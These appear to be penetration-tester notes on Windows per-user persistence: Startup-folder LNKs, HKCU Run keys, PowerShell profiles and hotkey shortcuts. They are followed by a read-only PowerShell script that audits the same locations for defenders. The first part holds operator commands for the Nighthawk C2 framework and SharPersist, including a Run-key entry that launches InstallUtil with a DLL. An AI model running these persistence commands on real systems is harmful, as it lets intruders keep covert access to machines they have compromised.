Windows Persistence Methods and Locations
Current user’s Startup folder:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
Deploying with Nighthawk:
upload C:\temp\persist\startup\StartUp.lnk "C:\\Users\\<USERNAME>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\StartUp.lnk"
Registry keys that launch on login - current user writable:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
Adding this key with SharPersist and Nighthawk:
- BE SURE YOU ESCAPE ALL THE BACKSLASHES!!
- ⚡ Persisting with SharPersist as shown below didn’t work when I tried it. Not sure why. May need more testing.
- We also didn’t get SCHTASKS persistence working with SharPersist on the same project. Maybe a SharPersist problem?
inproc-execute-assembly --no-amsi-patch --no-etw-patch c:\pipe\SharPersist.exe -t reg -c "%SYSTEMROOT%\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe" -a "/logfile= /u c:\\temp\\persist\\reg\\persist-10.dll" -k "hkcurun" -v "BHIS" -m add
PowerShell profile - runs every time PowerShell.exe runs:
%USERPROFILE%\Documents\WindowsPowerShell\Profile.ps1
- THIS FOLDER NEEDS TO BE CREATED IF IT DOESN’T ALREADY EXIST
Example:
md %USERPROFILE%\Documents\WindowsPowerShell
echo echo 'Hello World!' >> %USERPROFILE%\Documents\WindowsPowerShell\Profile.ps1
PowerShell ISE profile - runs every time PowerShell ISE is run:
%USERPROFILE%\Documents\WindowsPowerShell\Microsoft.PowerShellISE_profile.ps1
Hotkey - Upload a shortcut (LNK) with a hotkey to this location:
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\
Alternate path with the same effect:
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\
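
Auditing these locations (added example, not part of the original notes and not code from any tool named above): a read-only PowerShell sweep of the per-user paths and keys listed on this page, run as the user being checked. The function names and output fields are this example's own; it assumes the Documents folder is not redirected and that the WScript.Shell COM object is available.

```powershell
# Added example: read-only audit of the per-user locations named on this page.
# Emits one object per finding, so output can be piped to Export-Csv or Format-Table.
$shell = New-Object -ComObject WScript.Shell

function New-Finding($Location, $Item, $Value, $Hotkey, $Modified) {
    [pscustomobject]@{ Location = $Location; Item = $Item; Value = $Value
                       Hotkey = $Hotkey; Modified = $Modified }
}

function Get-FolderFindings {
    param([string]$Dir, [string]$Location, [switch]$HotkeyOnly)
    if (-not (Test-Path -LiteralPath $Dir)) { return }
    # -Force includes hidden files (desktop.ini will also appear in the Startup folder)
    Get-ChildItem -LiteralPath $Dir -File -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $target = ''; $hotkey = ''
        if ($_.Extension -eq '.lnk') {
            $lnk    = $shell.CreateShortcut($_.FullName)   # opens the LNK for reading only
            $target = ('{0} {1}' -f $lnk.TargetPath, $lnk.Arguments).Trim()
            $hotkey = $lnk.Hotkey
        }
        if ($HotkeyOnly -and -not $hotkey) { return }       # skip entries with no hotkey set
        New-Finding $Location $_.FullName $target $hotkey $_.LastWriteTime
    }
}

# Startup folder: every file here runs at logon, so list them all.
Get-FolderFindings "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup" 'Startup folder'

# Pinned-shortcut folders normally hold benign LNKs; only those carrying a hotkey are reported.
$pinned = "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch\User Pinned"
Get-FolderFindings "$pinned\ImplicitAppShortcuts" 'Hotkey LNK' -HotkeyOnly
Get-FolderFindings "$pinned\TaskBar" 'Hotkey LNK' -HotkeyOnly

# Current-user Run keys: report every value name and its command line.
foreach ($key in 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
                 'HKCU:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run') {
    if (-not (Test-Path -LiteralPath $key)) { continue }
    $k = Get-Item -LiteralPath $key
    foreach ($name in $k.GetValueNames()) {
        New-Finding 'HKCU Run key' "$key\$name" ($k.GetValue($name)) '' $null
    }
}

# PowerShell and ISE profiles: existence alone is worth a look; the hash allows baselining.
$profileDir = Join-Path $env:USERPROFILE 'Documents\WindowsPowerShell'
foreach ($file in 'Profile.ps1', 'Microsoft.PowerShellISE_profile.ps1') {
    $path = Join-Path $profileDir $file
    if (-not (Test-Path -LiteralPath $path)) { continue }
    $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
    New-Finding 'PowerShell profile' $path "SHA256 $hash" '' (Get-Item -LiteralPath $path).LastWriteTime
}
```

Saved as a .ps1 file, the output can be piped to Format-Table -AutoSize or Export-Csv and compared against a known-good baseline for the same user.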